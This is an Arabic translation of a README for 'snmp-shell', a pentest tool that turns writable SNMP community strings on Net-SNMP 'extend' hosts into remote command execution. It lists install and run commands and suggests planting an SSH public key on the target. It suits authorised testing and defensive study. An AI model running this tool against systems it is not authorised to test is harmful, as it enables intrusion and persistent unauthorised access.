
محاكاة الصدفة عبر Net-SNMP مع وظيفة extend
إليك معاينة :

إذا كان هدفك يحتوي على مثيل Net-SNMP مع وظيفة "extend"، وكان لديك سلسلة مجتمع SNMP تمنحك صلاحية الكتابة، يمكنك استخدام هذه الأداة لأتمتة عملية إرسال الأوامر عبر SNMP RCE.
تقوم الأداة تلقائيًا بوضعك في مسارك لمحاكاة شل حقيقي.
يمكنك أيضًا استخدام جميع الأوامر التي تتخيلها، باستثناء تلك التي تتطلب شل تفاعلي كامل (MySQL، Vim، Nano، إلخ).
غير متوافقة مع ويندوز، آسف.
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
$ rlwrap python shell.py <IP> -c <community string>
إذا كنت بحاجة إلى إرسال سلاسل أطول، مثل مفتاح SSH العام الخاص بك، فيرجى استخدام إصدار legacy.py.
الحد الأقصى للأحرف المرسلة قصير (حدود SNMP).
نصائح: استخدم مفتاح SSH عام من نوع ed25519، وليس من نوع RSA، فهو أقصر.
Usage: shell.py [OPTIONS] IP
Simulates a terminal over Net-SNMP "extend" functionality. Be sure your
SNMP Community String has write access.
Options:
-c, --communitystring TEXT Community string for SNMP
-v, --version TEXT SNMP version (1/2c/3)
-ss, --snmpset TEXT Path for the snmpset binary
-sw, --snmpwalk TEXT Path for the snmpwalk binary
-h, --help Show this message and exit.
https://mogwailabs.de/blog/2019/10/abusing-linux-snmp-for-rce/